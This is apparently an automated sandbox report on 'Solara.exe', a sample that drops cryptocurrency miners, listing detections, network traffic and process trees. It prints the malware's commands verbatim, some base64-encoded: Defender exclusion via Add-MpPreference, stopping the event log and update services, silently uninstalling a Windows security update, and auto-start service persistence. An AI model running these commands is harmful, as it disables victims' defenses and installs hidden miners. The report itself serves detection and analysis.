Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\xmr.exe", ParentImage: C:\Users\user\AppData\Local\Temp\xmr.exe, ParentProcessId: 6024, ParentProcessName: xmr.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto", ProcessId: 7484, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 2824, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", ProcessId: 7032, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\xmr.exe", ParentImage: C:\Users\user\AppData\Local\Temp\xmr.exe, ParentProcessId: 6024, ParentProcessName: xmr.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7192, ProcessName: sc.exe

Suricata alert: Timestamp: 2025-01-07T16:05:20.422524+0100; SID: 2803305; Severity: 3; Classtype: Unknown Traffic; Source IP: 192.168.2.5; Source Port: 49706; Destination IP: 140.82.121.4; Destination Port: 443; Protocol: TCP

AV Detection

Source: Solara.exe; Avira: detected
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe; Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\kx new.exe; Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe; ReversingLabs: Detection: 68%
Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe; ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe; ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe; ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe; ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\eth.exe; ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\kx new.exe; ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe; ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\xmr.exe; ReversingLabs: Detection: 76%
Source: Solara.exe; ReversingLabs: Detection: 68%
Source: Submitted sample; Integrated Neural Analysis Model: Matched 99.1% probability
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\kx new.exe; Joe Sandbox ML: detected
Source: Solara.exe; Joe Sandbox ML: detected
Source: Solara.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown; HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe; Code function: 19_2_0000027E8247DCE0 FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe; Code function: 22_2_0000012C42A8DCE0 FindFirstFileExW
Source: C:\Windows\System32\winlogon.exe; Code function: 66_2_000001E8589BDCE0 FindFirstFileExW
Source: global traffic; HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1 | Host: github.com
Source: Joe Sandbox View; IP Address: 185.199.108.133
Source: Joe Sandbox View; IP Address: 185.199.108.133
Source: Joe Sandbox View; IP Address: 140.82.121.4
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 140.82.121.4:443
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /quivings/Solara/main/Storage/version.txt HTTP/1.1 | User-Agent: Solara | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1 | Host: github.com
Source: global traffic; DNS traffic detected: DNS query: github.com
Source: global traffic; DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: GitHub.com | Date: Tue, 07 Jan 2025 15:05:18 GMT | Content-Type: text/html; charset=utf-8 | Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With | Cache-Control: no-cache | Strict-Transport-Security: max-age=31536000; includeSubdomains; preload | X-Frame-Options: deny | X-Content-Type-Options: nosniff | X-XSS-Protection: 0 | Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | Content-Length: 14 | Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox | Strict-Transport-Security: max-age=31536000 | X-Content-Type-Options: nosniff | X-Frame-Options: deny | X-XSS-Protection: 1; mode=block | Content-Type: text/plain; charset=utf-8 | X-GitHub-Request-Id: B54A:3ACEAD:634088:6E9AF8:677D42AF | Accept-Ranges: bytes | Date: Tue, 07 Jan 2025 15:05:19 GMT | Via: 1.1 varnish | X-Served-By: cache-ewr-kewr1740040-EWR | X-Cache: MISS | X-Cache-Hits: 0 | X-Timer: S1736262319.418474,VS0,VE28 | Vary: Authorization,Accept-Encoding,Origin | Access-Control-Allow-Origin: * | Cross-Origin-Resource-Policy: cross-origin | X-Fastly-Request-ID: c77d44a0548b70c662ebc1f547d9827e16e6f190 | Expires: Tue, 07 Jan 2025 15:10:19 GMT | Source-Age: 0
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: GitHub.com | Date: Tue, 07 Jan 2025 15:05:18 GMT | Content-Type: text/html; charset=utf-8 | Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With | Cache-Control: no-cache | Strict-Transport-Security: max-age=31536000; includeSubdomains; preload | X-Frame-Options: deny | X-Content-Type-Options: nosniff | X-XSS-Protection: 0 | Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: unknown; Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown; HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: sc.exeProcess created: 46
Source: C:\Windows\System32\dialer.exeCode function: 51_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,51_2_00000001400010C0
Source: C:\Windows\System32\dialer.exeCode function: 52_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,52_2_00000001400010C0
Source: C:\Windows\System32\winlogon.exe | Code function: 66_2_000001E8589B28C8 NtEnumerateValueKey,NtEnumerateValueKey
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04BFB570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08BF3E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_04EEB580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_04EEB570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_08F13A98
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Code function: 15_2_02700890
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Code function: 15_2_02700880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_049AB580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_049AB570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_08643A98
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Code function: 19_2_0000027E8232D0E0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Code function: 19_2_0000027E82321F2C
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Code function: 19_2_0000027E823338A8
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Code function: 19_2_0000027E8247DCE0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Code function: 19_2_0000027E82472B2C
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Code function: 19_2_0000027E824844A8
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Code function: 22_2_0000012C42A31F2C
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Code function: 22_2_0000012C42A438A8
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Code function: 22_2_0000012C42A3D0E0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Code function: 22_2_0000012C42A82B2C
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Code function: 22_2_0000012C42A944A8
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Code function: 22_2_0000012C42A8DCE0
Source: C:\Windows\System32\dialer.exe | Code function: 51_2_000000014000226C
Source: C:\Windows\System32\dialer.exe | Code function: 51_2_00000001400014D8
Source: C:\Windows\System32\dialer.exe | Code function: 51_2_0000000140002560
Source: C:\Windows\System32\dialer.exe | Code function: 52_2_000000014000226C
Source: C:\Windows\System32\dialer.exe | Code function: 52_2_00000001400014D8
Source: C:\Windows\System32\dialer.exe | Code function: 52_2_0000000140002560
Source: C:\Windows\System32\winlogon.exe | Code function: 66_2_000001E858981F2C
Source: C:\Windows\System32\winlogon.exe | Code function: 66_2_000001E8589938A8
Source: C:\Windows\System32\winlogon.exe | Code function: 66_2_000001E85898D0E0
Source: C:\Windows\System32\winlogon.exe | Code function: 66_2_000001E8589B2B2C
Source: C:\Windows\System32\winlogon.exe | Code function: 66_2_000001E8589C44A8
Source: C:\Windows\System32\winlogon.exe | Code function: 66_2_000001E8589BDCE0
Source: C:\Windows\System32\winlogon.exe | Code function: 66_2_000001E8589E1F2C
Source: C:\Windows\System32\winlogon.exe | Code function: 66_2_000001E8589F38A8
Source: C:\Windows\System32\winlogon.exe | Code function: 66_2_000001E8589ED0E0
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe A7FECFC225DFDD4E14DCD4D1B4BA1B9F8E4D1984F1CDD8CDA3A9987E5D53C239
Source: Solara.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engine | Classification label: mal100.evad.winEXE@146/40@2/2
Source: C:\Windows\System32\dialer.exe | Code function: 51_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
Source: C:\Windows\System32\dialer.exe | Code function: 52_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,Sleep
Source: C:\Windows\System32\dialer.exe | Code function: 51_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString
Source: C:\Windows\System32\dialer.exe | Code function: 51_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SolaraBootstrapper.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:892:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6004:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2752:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Users\user\Desktop\Solara.exe | File created: C:\Users\user\AppData\Local\Temp\eth.exe
Source: Solara.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Solara.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Solara.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Solara.exe | ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit graph_10-82
Source: C:\Users\user\Desktop\Solara.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit graph_0-82
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit graph_13-82
Source: unknownProcess created: C:\Users\user\Desktop\Solara.exe "C:\Users\user\Desktop\Solara.exe"
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\eth.exe "C:\Users\user\AppData\Local\Temp\eth.exe"
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr.exe "C:\Users\user\AppData\Local\Temp\xmr.exe"
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe"
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\kx new.exe "C:\Users\user\AppData\Local\Temp\kx new.exe"
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
